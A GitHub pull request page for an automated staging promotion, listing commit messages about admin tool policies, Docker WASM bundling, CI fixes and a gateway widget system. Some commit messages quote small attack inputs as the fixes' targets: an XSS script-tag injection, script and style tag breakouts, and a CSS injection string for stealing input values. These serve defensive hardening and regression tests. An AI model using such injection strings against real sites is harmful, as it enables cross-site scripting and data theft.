Skip to content

chore: promote staging to staging-promote/9399fccc-24203835221 (2026-04-09 18:19 UTC) - #2213

Merged
henrypark133 merged 37 commits into
staging-promote/9399fccc-24203835221from
staging-promote/e0bdd74f-24206212580
Apr 10, 2026
Merged

henrypark133 merged 37 commits into
staging-promote/9399fccc-24203835221from
staging-promote/e0bdd74f-24206212580

Conversation

@ironclaw-ci

@ironclaw-ci ironclaw-ci Bot commented Apr 9, 2026 •

Copy link
Copy Markdown
Contributor

Auto-promotion from staging CI

Batch range: 13c458e30cff5c437dfe3d19ddee0522f0c6e4fa..e0bdd74feffedfbed3c0d6ebbcd572996c18351f
Promotion branch: staging-promote/e0bdd74f-24206212580
Base: staging-promote/9399fccc-24203835221
Triggered by: Staging CI batch at 2026-04-09 18:19 UTC

Commits in this batch (5):

Current commits in this promotion (0)

Current base: staging-promote/9399fccc-24203835221
Current head: staging-promote/e0bdd74f-24206212580
Current range: origin/staging-promote/9399fccc-24203835221..origin/staging-promote/e0bdd74f-24206212580

  • (no non-merge commits in range)

Auto-updated by staging promotion metadata workflow

Waiting for gates:

  • Tests: pending
  • E2E: pending
  • Claude Code review: pending (will post comments on this PR)

Auto-created by staging-ci workflow

* feat(admin): admin tool policy to disable tools for users (#2078)

Adds the ability for admins to disable specific tools (e.g. build_software,
tool_install, skill_install) for all non-admin users or specific users in
multi-tenant deployments.

- AdminToolPolicy stored in settings table under __admin__ scope
- GET/PUT /api/admin/tool-policy endpoints (admin-only, multi-tenant gated)
- Enforcement in dispatcher before_llm_call strips disabled tools from LLM context
- Admin users are exempt from the policy

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: enforce admin tool policy across all execution paths

- Extract inline filtering into shared `filter_admin_disabled_tools()` helper
- Apply in JobDelegate and ContainerDelegate (not just ChatDelegate)
- Change from fail-open to fail-closed: DB errors return empty tool list
- Log warnings on deserialization failures instead of silent fallback
- Add `multi_tenant` field to WorkerDeps for job-level enforcement
- Add `db()` accessor to SystemScope for system-level DB access

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: tighten admin tool policy review follow-ups

* fix(admin-policy): enforce ordering and add dispatcher e2e regression

* fix(admin-policy): address review feedback — encapsulate DB access, cache policy, strengthen validation

- Remove raw `SystemScope::db()` accessor; add purpose-built
  `get_admin_tool_policy()`, `set_admin_tool_policy()`, `get_user_role()`
  methods to preserve tenant isolation boundary
- Canonicalize admin role detection: add `UserRole::is_admin()` helper,
  replace string comparisons in engine.rs and role enum comparisons across
  dispatcher/job delegates with the single canonical path
- Cache admin tool policy per agentic loop via `AdminToolPolicyCache`
  (tokio::sync::OnceCell) to avoid DB reads on every LLM iteration
- Switch `disabled_tools` from Vec<String> to HashSet<String> for O(1) lookups
- Extract shared `validate_admin_tool_policy()` with tool name format checks,
  user key validation, and 32KB max payload size; deduplicate from HTTP handler
- Add `parse_admin_tool_policy()` helper with tracing::warn on deserialization
  failure (was silently falling back to default)
- Document PUT endpoint's last-write-wins replacement semantics
- Add regression tests: path-like tool names, invalid user keys, oversized
  policy, and E2E test verifying disabled tools don't reach the LLM

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(admin-policy): entry count caps, fail-closed GET, dispatch-exempt annotation

- Add entry count limits: 1000 global disabled tools, 1000 user keys,
  1000 per-user entries — prevents multi-MB policy payloads
- GET handler now returns 500 on corrupt stored policy instead of silently
  falling back to empty default (fail-closed, consistent with enforcement)
- Add dispatch-exempt annotation explaining why these admin handlers
  access state.store directly (consistent with users/secrets/tokens handlers)
- Remove redundant debug_assert_ne in users_create_handler (runtime guard
  already covers both debug and release builds)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(admin-policy): merge staging, add inline dispatch-exempt annotations

Merge staging to pick up ToolDispatcher (#2049) and the "everything goes
through tools" pre-commit check. Add inline // dispatch-exempt: annotations
on the state.store access lines so the pre-commit check passes. These
handlers are admin-only infrastructure operating on a cross-tenant policy
scope — consistent with other admin handlers that haven't been migrated
to the dispatcher yet.

Also fix post-merge compilation: add auth_manager and tool_dispatcher
fields to test struct initializers.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(admin-policy): satisfy per-line dispatch-exempt check on all state.* accesses

The pre-commit hook (scripts/pre-commit-safety.sh) checks each added line
that touches state.{store,workspace_pool,...} for a trailing
// dispatch-exempt: comment on the same physical line. The previous
annotations were either:
  - on the workspace_pool lines: missing entirely
  - on the store.as_ref().ok_or(( lines: rustfmt-broken because the
    trailing comment was placed inside the tuple, where the per-line
    check no longer matches it

Lift each state.workspace_pool / state.store access into a dedicated
local binding that carries the trailing dispatch-exempt comment, so the
annotation survives cargo fmt and the per-line hook regex matches.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: Illia Polosukhin <ilblackdragon@gmail.com>
@github-actions github-actions Bot added scope: agent Agent core (agent loop, router, scheduler) scope: channel/web Web gateway channel scope: worker Container worker size: XL 500+ changed lines risk: medium Business logic, config, or moderate-risk modules contributor: core 20+ merged PRs labels Apr 9, 2026
serrrfirat and others added 22 commits April 9, 2026 13:20
* feat(tui): ship TUI in default binary

Add `tui` to default Cargo features so the Ratatui terminal UI is
included in standard builds. The TUI only activates when explicitly
configured at runtime (`config.channels.tui`), so server deployments
are unaffected — the deps compile in but nothing initializes.

Also remove `dist = false` from ironclaw_tui so cargo-dist includes
it in release artifacts.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(tui): make arboard/clipboard optional to support headless builds

arboard requires X11/Wayland dev headers on Linux, breaking builds in
minimal Docker images and headless CI runners. Move arboard and image
behind an opt-in `clipboard` feature (defaulted on) so headless builds
can exclude them while desktop builds keep full clipboard support.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat(docker): pre-bundle WASM extensions in staging image

Add a wasm-builder Docker stage that builds all registry tool/channel
extensions from source and copies the .wasm + .capabilities.json files
into the staging runtime image. Production images are unaffected — Docker
only builds the wasm-builder stage when --target runtime-staging is used.

The docker.yml workflow passes --target runtime-staging for scheduled
(staging) builds and workflow_dispatch with tag=staging, while all other
builds use --target runtime (no extensions).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(docker): address PR review feedback

- Use COPY --chown instead of separate RUN chown layer (fewer layers)
- Reorder stages so runtime (production) is last — bare docker build
  defaults to production, not staging
- Use --locked when Cargo.lock is present for reproducible WASM builds

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix(wasm): upgrade wasmtime to 43.0.1

* chore(wasm): align wasmparser with wasmtime deps
…2219)

Add railway.toml with target = "runtime-staging" so Railway builds the
Docker target that includes all WASM tool/channel extensions. All
Railway environments deploy from the staging branch and benefit from
having extensions pre-installed.

Depends on the runtime-staging Dockerfile target added in #2210.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix(ci): resolve 3 staging test failures

- Add V21-V23 checksums to migrations/checksums.lock (missed in #2049)
- Guard telegram token URL test with ENV_MUTEX to prevent env var race
- Call setAuthFlowPending before early return in handleAuthRequired

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(test): use ScopedEnvVar for env cleanup in telegram token test

Replaces bare unsafe remove_var with ScopedEnvVar::set("") which
holds ENV_MUTEX and restores the previous value on drop, avoiding
state leakage into subsequent tests.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
ARG alone doesn't invalidate layers on BuildKit unless referenced.
Add a RUN that echoes the value before the expensive WASM build step.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Added a QA Bug Report template for issue tracking during testing.
…ith widget system (#1725)

* feat(frontend): extract frontend into ironclaw_frontend crate with widget extension system

Moves all frontend static assets (app.js, style.css, index.html, i18n/*,
theme-init.js, favicon.ico) from src/channels/web/static/ into a dedicated
ironclaw_frontend crate. The crate also adds:

- Layout configuration types (branding, tab order, chat features, per-widget config)
- Widget manifest types with named slot system (tab, chat_header, sidebar, etc.)
- CSS scoping utility (auto-prefixes selectors with [data-widget="id"])
- Bundle assembly (injects layout config, widgets, and custom CSS into HTML)
- Frontend API endpoints (GET/PUT layout, list widgets, serve widget files)
- Browser-side IronClaw.registerWidget() API with authenticated fetch,
  event subscription, theme access, and i18n

Widgets are stored in workspace at frontend/widgets/{id}/ and served via
the API. Layout config is stored at frontend/layout.json. The agent can
create/edit both using existing memory_write/memory_read tools.

Gateway handlers now reference ironclaw_frontend::assets constants instead
of include_str!() with local paths, completing the separation.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address CI failures — license, rust-version, formatting, manifest warnings

- Add license = "MIT OR Apache-2.0" to ironclaw_frontend Cargo.toml (cargo-deny)
- Fix rust-version to 1.92 to match other crates
- Log warning for invalid widget manifests instead of silent skip
- Run cargo fmt across all files

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): structured data cards + chat renderer API for rich message rendering

Agent responses containing JSON/structured data (like mission results,
status objects) now render as styled cards with labeled fields, status
badges, and monospaced IDs instead of raw text.

Built-in rendering:
- Detects inline JSON objects (including Python-style single quotes)
- Renders as data cards with key-value rows
- Status/state fields get colored badges (success/error/pending)
- UUIDs rendered in monospace

Extensible via widgets:
- IronClaw.registerChatRenderer({ id, match, render, priority })
- First matching renderer wins (priority ordering)
- Renderer gets the content element to mutate in place

Also adds ChatRenderer variant to WidgetSlot enum.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): hash-based URL navigation for page refresh persistence

Navigation state is now encoded in window.location.hash so refreshing
the page (or sharing a URL) restores the current view:

  #/chat                   → chat tab, assistant thread
  #/chat/{threadId}        → specific conversation
  #/memory/{path/to/file}  → memory browser with file open
  #/jobs/{jobId}           → job detail view
  #/routines/{id}          → routine detail view
  #/settings/{subtab}      → settings sub-tab (extensions, etc.)
  #/logs                   → logs tab

Hooked into all navigation functions: switchTab, switchThread,
switchToAssistant, createNewThread, readMemoryFile, openJobDetail,
closeJobDetail, openRoutineDetail, closeRoutineDetail,
switchSettingsSubtab.

Thread restore is deferred until loadThreads() completes (async),
then the pending thread ID is matched against the loaded thread list.

Browser back/forward buttons work via hashchange listener.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): auto-open README.md when first visiting Memory tab

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(frontend): preserve URL hash across page refresh

Two bugs caused the hash to reset on Cmd+R:
1. Auth URL cleanup (replaceState) stripped the hash fragment —
   now preserves it via cleaned.hash
2. restoreFromHash() called switchTab() which called updateHash()
   overwriting the full hash before the detail was restored —
   now suppresses hash updates during the entire restore sequence

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): seed frontend/README.md with customization guide for agent

The agent didn't know it could customize the frontend via workspace writes.
Now seeds frontend/README.md on first boot with a guide covering:
- Layout config (branding, colors, tab order) via frontend/layout.json
- Custom CSS via frontend/custom.css with common variable names
- Widget creation (manifest + index.js + style.css)
- API endpoints

Also seeds frontend/.config with skip_indexing: true so frontend assets
aren't chunked/embedded for search.

When a user says "change the color scheme to red", the agent can now
discover frontend/README.md via memory_tree, read the guide, and write
the appropriate layout.json or custom.css.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(frontend): wire workspace-aware serving for index.html and style.css

The index_handler and css_handler now read from workspace to apply
frontend customizations on page load:

- index_handler: reads frontend/layout.json, discovers widgets in
  frontend/widgets/*, reads frontend/custom.css, then calls
  assemble_index() to inject branding colors, layout config,
  widget scripts, and custom CSS into the base HTML.
  Falls back to embedded HTML if no customizations exist.

- css_handler: appends frontend/custom.css from workspace after
  the embedded base stylesheet.

This completes the end-to-end flow:
  Agent writes frontend/layout.json → user refreshes → sees changes

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(frontend): wire up remaining widget system gaps

Audit-driven fixes for the widget extension system:

1. Widget tab panel ID: panels now get id="tab-{widgetId}" so
   switchTab() can find and activate them

2. Widget JS auth: inline widget JS in assembled HTML instead of
   <script src> to protected endpoint (browser script tags can't
   send Authorization headers)

3. Layout config: fully implement tab ordering, default_tab,
   chat.suggestions, chat.image_upload application

4. SSE event forwarding: wrap EventSource.addEventListener to
   intercept all named events and dispatch to widget subscribers
   via IronClaw.api._dispatch()

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(frontend): XSS prevention, widget queue drain, code-block false positives

Security (2 XSS fixes):
1. HTML-escape branding title in assemble_index() to prevent
   <script>alert(1)</script> injection via layout.json
2. Escape </script> in inlined widget JS to prevent script tag
   breakout — uses <\/script> replacement
3. Escape widget IDs in HTML attributes via escape_html_attr()

Correctness:
4. Drain _widgetInitQueue after DOM is ready — widgets registered
   before tab-bar exists now mount correctly instead of silently
   failing
5. Skip inline <code> elements in upgradeInlineJson to prevent
   false-positive JSON card rendering on code spans like
   <code>{key: value}</code>
6. Document scope_css limitation with nested @media rules

Tests (13 new):
- XSS: title injection escaped, widget JS </script> breakout escaped,
  widget ID attribute escaped
- Edge cases: escape_html basic, escape_html_attr quotes, missing
  head/body tags, empty widget JS, whitespace-only custom CSS skipped
- Widget: at-rule not prefixed, declarations preserved, special chars
  in widget ID, all slot variants round-trip, minimal manifest

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* style: fix clippy — collapsible if, while_let_on_iterator

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(ci): resolve frontend clippy and formatting failures

* fix(frontend): address PR review — XSS, scope_css, cache, dedup

Security (3 XSS gaps):
1. Layout JSON injected into <script>window.__IRONCLAW_LAYOUT__</script>
   is now run through escape_tag_close() — serde_json does not escape `<`
   or `/`, so a branding title containing `</script>` previously broke
   out of the script tag. Case-insensitive, UTF-8 safe.
2. Widget CSS and custom CSS injected into <style> tags are now escaped
   the same way against `</style>` breakouts.
3. New escape_tag_close() helper handles `</script`/`</style` uniformly
   (case-insensitive with tail preserved, via char-boundary walk).

Correctness:
4. scope_css now tracks brace depth via a stack that distinguishes rule
   lists from declaration blocks. Selectors nested inside @media,
   @supports, @container, @layer, @document, @scope are recursively
   scoped. @keyframes/@font-face/@page bodies pass through opaque so
   inner keyframe selectors (0%, 100%) are not prefixed. The old
   single-bool parser produced unbalanced output on any nested rule.
5. WidgetInstanceConfig.enabled now defaults to true (via serde_default
   + manual Default impl). A layout entry that omits `enabled` while
   setting `config` no longer silently disables the widget.
6. build_frontend_html short-circuit replaced with a
   layout_has_customizations() helper covering all branding/tabs/chat
   fields. The old boolean missed subtitle, logo_url, favicon_url,
   default_tab, image_upload.
7. Custom CSS is now served only via /style.css (css_handler). Removed
   from FrontendBundle injection to prevent double-application.
8. Dead pub index_handler/css_handler/js_handler in
   handlers/static_files.rs removed — routes use private handlers in
   server.rs that need GatewayState.
9. Widget file path validation is now component-based via
   is_safe_segment / is_safe_relative_path. Rejects `.`, `..`, empty,
   `/`, `\`, NUL in any component, plus leading `/`. MIME detection is
   case-insensitive and adds .mjs / .map.
10. Layout and widget-manifest parse errors now log tracing::warn!
    instead of silently falling back.

Extension system follow-ups:
11. Extracted shared widget-loading helpers (load_widget_manifests,
    load_resolved_widgets, read_widget_manifest) in handlers/frontend.rs.
    frontend_widgets_handler and build_frontend_html both delegate, so
    widget discovery exists in exactly one place.
12. New FrontendHtmlCache in GatewayState. Cache key is derived from the
    updated_at of frontend/layout.json and the frontend/widgets/
    directory (max child mtime) via a single list("frontend/") call.
    A cache hit skips reading every widget manifest/JS/CSS per request.
    Edits invalidate naturally because list() sees the newer timestamp.
    Cache survives rebuild_state() by cloning the Arc.
13. upgradeInlineJson rewritten without the nested-quantifier regex. New
    _findJsonCandidates does a linear bracket scan that respects string
    literals and fast-skips <code>/<pre> regions. Three hard caps bound
    worst-case work (MAX_PARA_LEN=20000, MAX_SCAN=5000,
    MAX_CANDIDATES=32), eliminating the catastrophic-backtracking risk.

Tests (29 new):
- bundle.rs: 5 — layout JSON / widget CSS / custom CSS <script>/<style>
  breakouts, escape_tag_close case-insensitive, multi-byte safety
- widget.rs: 5 — @media inner selector scoped, nested @supports+@media,
  @keyframes passthrough, sibling rules in @media, complex mix brace
  balance
- layout.rs: 3 — enabled defaults true, Default impl enabled,
  explicit false respected
- handlers/frontend.rs: 4 — segment allows/rejects, relative path
  allows/rejects (traversal, backslash, encoded separators)

Quality gate:
- cargo fmt clean
- cargo clippy --all --benches --tests --examples --all-features →
  zero warnings
- cargo test --lib -p ironclaw_frontend -p ironclaw → 4171 main +
  43 frontend tests pass

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: post-merge — PairingStore::new_noop, CLI snapshot, docs

Merge of origin/staging surfaced three small follow-ups:

1. src/channels/wasm/wrapper.rs — PairingStore::new() signature changed
   in staging to take (db, cache). Switch the test call site to
   PairingStore::new_noop() to match other tests in the file.

2. src/cli/snapshots/..long_help_output_without_import.snap — accept
   the new snapshot. Clap's render_long_help for --auto-approve now
   emits an indented blank line between the short and long description;
   this test was already failing on staging tip (see Staging CI run
   24021660555) so the snapshot update was needed regardless of this PR.

3. src/workspace/seeds/FRONTEND.md — address new copilot comments:
   - Placeholder is `{id}` (matches API path segment and manifest id
     field), not `{name}`.
   - Only `slot: "tab"` is actually mounted by the browser runtime.
     Trim the slot list to what's implemented and mention
     IronClaw.registerChatRenderer() for inline rendering. The extra
     WidgetSlot variants stay in the Rust API for forward compatibility
     but are no longer advertised to users until mounting is wired.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* refactor: rename ironclaw_frontend → ironclaw_gateway, .system/gateway/ workspace

Two coupled renames to align frontend assets with the broader `.system/`
namespace introduced by other in-progress work:

1. Workspace folder: `frontend/` → `.system/gateway/`
   - layout.json, custom.css, widgets/{id}/, README.md, .config all
     move under `.system/gateway/`
   - LAYOUT_PATH and WIDGETS_DIR are now constants in the handler so a
     future move is a one-line change
   - is_config_path test updated to use the new path
   - FRONTEND.md seed rewritten to point at `.system/gateway/`
   - Cache key doc comments updated to match
   - No legacy or migration shim — this never shipped to prod

2. Crate: `ironclaw_frontend` → `ironclaw_gateway`
   - Matches how the surrounding subsystem is called (`channels/web` is
     "the gateway"). Cleaner mental model: workspace folder, crate name,
     and module name all align.
   - Directory renamed via `git mv` so history is preserved.
   - Cargo.toml workspace member + dependency updated; package name
     updated; description tweaked to "gateway frontend assets".
   - All `use ironclaw_frontend::` imports rewritten in server.rs and
     handlers/frontend.rs.
   - Doctest in widget.rs updated to use the new crate name.
   - Cargo.lock regenerated.

The HTTP API paths stay as `/api/frontend/*` since they're a public
surface; only the internal workspace path and crate name moved.

Quality gate:
- cargo fmt clean
- cargo clippy --all --benches --tests --examples --all-features →
  zero warnings
- cargo test -p ironclaw_gateway → 43 unit + 1 doctest pass
- cargo test --lib -p ironclaw → 4228 pass (8 unrelated IPv6/DNS
  validation failures, also failing on clean post-merge baseline)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): per-request CSP nonce for inlined widget scripts

Copilot review caught that `assemble_index()` injects two kinds of inline
`<script>` blocks (the layout-config script and per-widget module scripts),
but the gateway's CSP sets `script-src 'self' …CDNs…` with no
`'unsafe-inline'` and no nonce — so the browser silently blocks every
injected script the moment any customization is enabled. The widget
runtime would never execute on a customized index page.

Fix uses a per-request CSP nonce (W3C standard pattern):

- `crates/ironclaw_gateway/src/bundle.rs`
  - New `NONCE_PLACEHOLDER` sentinel constant, re-exported from the crate root
  - `assemble_index()` stamps `nonce="__IRONCLAW_CSP_NONCE__"` on every
    injected `<script>` tag (both the layout-config script and each
    widget's module script)
  - Inline `<style>` blocks deliberately do NOT carry a nonce — the
    gateway's CSP allows `'unsafe-inline'` for `style-src`, so adding
    one would be dead weight; pinned with a regression test
  - Three new tests verify the placeholder appears on layout + widget
    scripts and is absent on widget styles

- `src/channels/web/server.rs`
  - Static CSP layer now reads from a single `BASE_CSP` constant so the
    static and per-response variants stay in lock-step
  - New `build_csp_with_nonce(nonce)` produces the same CSP with
    `'nonce-{nonce}'` added to script-src, preserving the explicit CDN
    list and the strict `style-src 'self' 'unsafe-inline' …` policy
  - New `generate_csp_nonce()` returns 16 random bytes hex-encoded via
    OsRng — same primitive `tokens_create_handler` already uses
  - `index_handler` now returns `Response` (not `impl IntoResponse`) so
    it can branch:
    - Workspace has no customizations → serve embedded `INDEX_HTML`
      unchanged; the static CSP layer applies (no inline scripts to
      authorize anyway)
    - Workspace has customizations → generate fresh nonce, replace
      placeholder in cached HTML, and emit a per-response
      `Content-Security-Policy` header with the nonce. Setting the
      header here suppresses the global `if_not_present` layer for this
      response only.
  - Two new unit tests pin the nonce-source position in script-src and
    the format/uniqueness of `generate_csp_nonce()`

The HTML cache still works because the cached HTML contains the
placeholder (not the actual nonce); per-request substitution preserves
caching while the browser still sees a unique nonce on every page load.

Quality gate:
- cargo fmt clean
- cargo clippy --all --benches --tests --examples --all-features →
  zero warnings
- cargo test -p ironclaw_gateway → 46 pass (+3 nonce tests)
- cargo test --lib -p ironclaw → 4238 pass (+2 CSP tests)

Refs: PR #1725 review by copilot-pull-request-reviewer

[skip-regression-check]

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): wire ko.js asset through ironclaw_gateway::assets

The merge of staging brought in a Korean i18n pack referenced via
include_str!("static/i18n/ko.js") in src/channels/web/server.rs.
After the gateway extraction the static/ directory moved into
crates/ironclaw_gateway/static/, so the legacy include_str! path
no longer resolved. Add I18N_KO_JS to ironclaw_gateway::assets and
make the i18n_ko_handler reference it like the other language packs.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test(e2e): add Playwright coverage for chat-driven frontend customization

Adds two end-to-end scenarios for the widget extension system shipped in
PR #1725, both driven by talking to the agent in chat:

1. **Tab bar to left side panel.** The user asks the agent to move the
   tab bar; the mock LLM emits a `memory_write` tool call writing
   `.system/gateway/custom.css`, and after a reload the test asserts the
   served stylesheet contains the overlay, the computed flex-direction
   of `.tab-bar` is `column`, and the bar is now taller than it is wide.

2. **Workspace-data widget.** The user asks the agent to create a
   "Skills" widget that renders workspace skills. Two chat turns write
   `.system/gateway/widgets/skills-viewer/manifest.json` and `index.js`
   into the workspace. After a reload the test verifies the new tab
   button appears in `.tab-bar`, switches to it, waits for the widget's
   `data-testid="skills-viewer-root"` to mount, and asserts the widget
   actually fetched `/api/skills` (no `skills-viewer-error` marker) and
   that the panel carries the `data-widget="skills-viewer"` attribute
   the gateway runtime stamps for CSS isolation.

Both tests share a `clean_customizations` fixture that wipes the
workspace overlay files before and after each run so the session-scoped
gateway server stays isolated across tests in the file (`memory_write`
treats empty content as effectively cleared, and the gateway skips
empty / unparseable widget files silently).

Supporting changes:

- **mock_llm.py**: three new `TOOL_CALL_PATTERNS` (`customize: move
  tab bar to left`, `customize: create skills viewer manifest`,
  `customize: install skills viewer code`) that emit one
  `memory_write` call per turn — the existing one-tool-per-response
  shape is preserved.
- **app.js (`_addWidgetTab`)**: fix a latent bug where widget tabs
  would be queued forever because the function looked for a
  `.tab-content` / `#tab-content` element that the gateway HTML never
  ships. The built-in tab panels live as siblings of `.tab-bar` inside
  `#app`, so we now resolve the parent off the first existing
  `.tab-panel` (with `#app` as a final fallback). Without this fix the
  Skills widget tab never mounts and the second scenario can't pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test(e2e): support multi tool calls per response in mock_llm

The mock LLM previously emitted at most one tool call per assistant
turn. That shape silently bypasses the v2 engine and CodeAct dispatch
paths, where a single response can fan out into several parallel tool
calls (or several Python helper invocations from one script). Tests
written against that constraint were either contorted into multiple
chat turns or quietly failed to cover multi-call regressions.

Changes:

- ``TOOL_CALL_PATTERNS`` args functions may now return ``list[dict]``
  instead of a single ``dict``. Each item is its own
  ``{"tool_name", "arguments"}`` pair, so one trigger can mix several
  tools in one response. ``_normalize_tool_calls`` always wraps the
  return value into a list so the dispatcher stays shape-agnostic.

- ``match_tool_call`` returns ``list[dict] | None``.

- ``_tool_call_response`` and ``_stream_tool_call`` now accept either a
  single dict (legacy callers) or a list. The streaming path emits
  per-tool-call header + arguments chunks with distinct ``index``
  values, exercising clients' per-index merging logic the same way real
  providers force them to.

- ``_find_tool_results`` collects every fresh ``role: tool`` message
  after the most recent user turn (not just the first), and the
  chat-completion summary path renders a multi-line acknowledgment
  when more than one tool ran in a single turn. The single-result
  helper is kept as a thin shim for the special-response path.

- The PR #1725 customization scenario is consolidated: instead of
  three separate triggers (one memory_write each), the
  ``customize: install skills viewer widget`` trigger now emits *both*
  the manifest and ``index.js`` writes in one assistant turn. The
  ``customize: move tab bar to left`` trigger stays single-call to
  cover the legacy code path. The Playwright test in
  ``test_widget_customization.py`` is updated to a single chat turn
  for the widget install — if the v2 engine ever drops the second
  parallel call, the test will fail because the new tab can't mount
  without both files.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 review feedback

Four issues raised in the 2026-04-07 review pass:

1. **Widget id / directory mismatch** (`src/channels/web/handlers/frontend.rs`).
   `read_widget_manifest` now rejects widgets whose `manifest.id` does
   not match the on-disk directory name. The loader uses the directory
   name to compute file paths (`{WIDGETS_DIR}{dir}/index.js`) while the
   layout-config gating and the public
   `/api/frontend/widget/{id}/{*file}` endpoint key off `manifest.id`.
   When those drift, code can be mounted from one folder under a
   different id and the file API silently 404s — a correctness footgun
   for widget authors and a path-confusion attack surface for the
   serving handler. Fix lives in the shared helper so both
   `load_resolved_widgets` and `load_widget_manifests` get it. Adds
   regression tests for both the rejection and the matching path.

2/3. **`memory_write` doc examples used the wrong parameter name**
   (`src/workspace/seeds/FRONTEND.md`). The seeded customization guide
   showed `memory_write path=".system/gateway/..."`, but the actual tool
   parameter is `target` (`src/tools/builtin/memory.rs`). As written the
   examples wouldn't work if copy-pasted into a tool call. Both
   examples (layout.json + custom.css) updated to `target=`.

4. **`css_handler` allocated on the hot path** (`src/channels/web/server.rs`).
   The handler always called `assets::STYLE_CSS.to_string()` in the
   no-overlay branches, copying the entire embedded stylesheet on
   every request. Switched the local to `Cow<'static, str>` so the
   common path borrows the static string and only the overlay branch
   pays for an owned `format!`.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero warnings
- `cargo test --no-default-features --features libsql --lib channels::web::handlers::frontend` — 6 passed (4 existing + 2 new regression tests)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 paranoid-architect review

Five issues raised in the 2026-04-07 review pass:

1. **High — `</style>` breakout XSS in branding CSS-vars injection**
   (`crates/ironclaw_gateway/src/bundle.rs`). Every other inline injection
   point in `assemble_index()` runs through `escape_tag_close`, but the
   branding `<style>` block formatted directly. A hostile color value
   containing `</style>` could close the tag early and inject HTML. Now
   wraps `css_vars` in `escape_tag_close(&css_vars, "</style")` for
   defense in depth, with a regression test in
   `test_assemble_index_branding_style_breakout_escaped`.

2. **Medium — CSS property injection via unvalidated branding colors**
   (`crates/ironclaw_gateway/src/layout.rs`). `to_css_vars()` interpolated
   `primary` / `accent` strings raw into `--color-primary: {};`, letting
   a hostile `layout.json` break out of the `:root {}` block (e.g.
   `red; } .chat-input[value^="s"] { background: url(...) }`). Added
   `is_safe_css_color()` validator that accepts hex literals, modern
   functional notation including `rgb(0 0 0 / 50%)`, and bare named
   colors, while rejecting `;`, `{}`, `<>`, quotes, backslash, `*`
   (handles both `/*` and `*/` comment markers), `url(...)`, and unknown
   functions. `to_css_vars()` silently drops invalid values so the rest
   of the branding config still applies. Six new unit tests cover the
   accepted forms, the injection vectors, and the `to_css_vars` drop.

3. **Medium — CSP policy duplication risks silent drift**
   (`src/channels/web/server.rs`). `BASE_CSP` and `build_csp_with_nonce`
   re-hardcoded every directive independently, so adding a `connect-src`
   to one would silently leave the other on the old policy. Extracted
   per-directive constants (`STYLE_SRC`, `FONT_SRC`, `CONNECT_SRC`,
   `IMG_SRC`, `FRAME_SRC`, `FORM_ACTION`) and built both flavors via a
   single `build_csp(nonce: Option<&str>)` helper. `BASE_CSP_HEADER` is
   now a `LazyLock<HeaderValue>` (with a safe minimal fallback to honor
   the no-`.expect()` rule on the request path). Added two regression
   tests: `test_base_and_nonce_csp_agree_outside_script_src` strips the
   `script-src` directive from both flavors and asserts byte equality,
   and `test_base_csp_header_matches_build_csp_none` locks the lazy
   header to `build_csp(None)`.

4. **Medium — `_wipe_customizations` ignored HTTP status**
   (`tests/e2e/scenarios/test_widget_customization.py`). The cleanup
   posts now assert `status_code == 200` with `resp.text` in the
   message, so an auth/server failure surfaces immediately instead of
   bleeding leftover workspace state into the next test.

5. **Drive-by — pre-existing flake in `test_telegram_token_colon_preserved
   _in_validation_url`** (`src/extensions/manager.rs`). The test reads
   `IRONCLAW_TEST_TELEGRAM_API_BASE_URL` via `telegram_bot_api_url`
   without taking the `lock_env()` mutex, so when a parallel test holds
   the override the read races and the assertion sees
   `http://127.0.0.1:.../bot…` instead of `https://api.telegram.org/`.
